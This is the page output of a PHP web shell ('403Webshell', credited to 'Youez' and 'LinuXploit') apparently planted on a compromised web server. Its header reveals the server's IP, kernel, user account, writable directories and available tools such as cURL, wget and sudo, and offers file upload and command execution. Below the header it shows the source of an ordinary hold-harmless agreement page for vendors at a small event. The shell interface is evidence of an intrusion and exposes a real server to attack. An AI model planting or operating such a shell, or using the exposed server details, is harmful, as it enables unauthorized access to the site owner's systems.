403Webshell
Server IP : 173.209.174.21  /  Your IP : 216.73.216.89
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux wcfs-server 6.8.0-124-generic #124-Ubuntu SMP PREEMPT_DYNAMIC Tue May 26 13:00:45 UTC 2026 x86_64
User : nodor ( 1000)
PHP Version : 8.3.6
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/thelittlebigshow/vendor-reg/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/thelittlebigshow/vendor-reg/hold_harmless.php
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Hold Harmless Agreement</title>
    <link href="https://fonts.googleapis.com/css2?family=Roboto:wght@400;500&display=swap" rel="stylesheet">
    <style>
        body {
            font-family: 'Roboto', sans-serif;
            background-color: #f4f7fb;
            color: #333;
            margin: 0;
            padding: 0;
            display: flex;
            justify-content: center;
            align-items: flex-start;
            min-height: 100vh;
        }

        .main-container {
            background-color: #fff;
            padding: 30px;
            margin-top: 30px;
            border-radius: 10px;
            box-shadow: 0 10px 20px rgba(0, 0, 0, 0.1);
            width: 80%;
            max-width: 900px;
        }

        h2 {
            text-align: center;
            color: #1E90FF;
            margin-bottom: 20px;
        }

        h3 {
            color: #1E90FF;
            margin-top: 20px;
        }

        p {
            line-height: 1.6;
            margin-bottom: 15px;
            font-size: 16px;
        }

        ul {
            list-style-type: disc;
            margin-left: 20px;
        }

        ul li {
            margin-bottom: 10px;
            font-size: 16px;
        }

        .button-back {
            display: inline-block;
            background-color: #1E90FF;
            color: #fff;
            padding: 10px 20px;
            border-radius: 5px;
            text-decoration: none;
            text-align: center;
            font-size: 16px;
            margin-top: 30px;
        }

        .button-back:hover {
            background-color: #1C86EE;
        }

        .logo {
            display: block;
            max-width: 100%;
            max-height: 150px;
            margin: 20px auto;
            object-fit: contain;
        }

        /* Responsive layout */
        @media (max-width: 768px) {
            .main-container {
                width: 95%;
                padding: 20px;
            }
        }
    </style>
</head>
<body>

    <div class="main-container">
        <!-- Logo at the top of the page -->
        <img src="https://www.thelittlebigshow.com/wp-content/uploads/2024/02/cropped-Logo.jpg" alt="The Little Big Show Logo" class="logo">

        <h2>Hold Harmless Agreement</h2>
        <p>
            This Hold Harmless Agreement is entered into on the date of the vendors registration between The Little Big Show (Organizer) and the registered vendor (Vendor) participating in The Little Big Show to be held on the 2nd Saturday in June at Wilson Creek, WA.
        </p>
        
        <h3>Agreement Terms</h3>
        <p>
            By participating in this event, the Vendor agrees to the following terms:
        </p>
        <ul>
            <li>The Vendor releases the Organizer from any liability, damages, or claims for injury, loss, or damage to the Vendor property arising from participation in the event.</li>
            <li>The Vendor is solely responsible for any damages caused to their property or injuries to their personnel while attending the event.</li>
            <li>The Vendor agrees to comply with all local, state, and federal laws as well as event rules and regulations.</li>
            <li>The Organizer reserves the right to deny or revoke the Vendor participation in the event if the Vendor violates any terms of this agreement.</li>
        </ul>

        <h3>Indemnification</h3>
        <p>
            The Vendor agrees to indemnify and hold harmless the Organizer, its officers, agents, employees, and volunteers from and against any and all claims, liabilities, or damages arising out of the Vendor participation in the event, including legal fees and costs.
        </p>

        <h3>Acceptance</h3>
        <p>
            By submitting the registration form, the Vendor acknowledges that they have read, understood, and agree to the terms of this Hold Harmless Agreement.
        </p>

        <p>
            If you have any questions regarding this agreement, please contact us at <a href="mailto:info@wilsoncreek.org">info@wilsoncreek.org</a> or <strong>509-855-6396</strong>.
        </p>

        <a href="vendor_registration.html" class="button-back">Back to Registration</a>
    </div>

</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit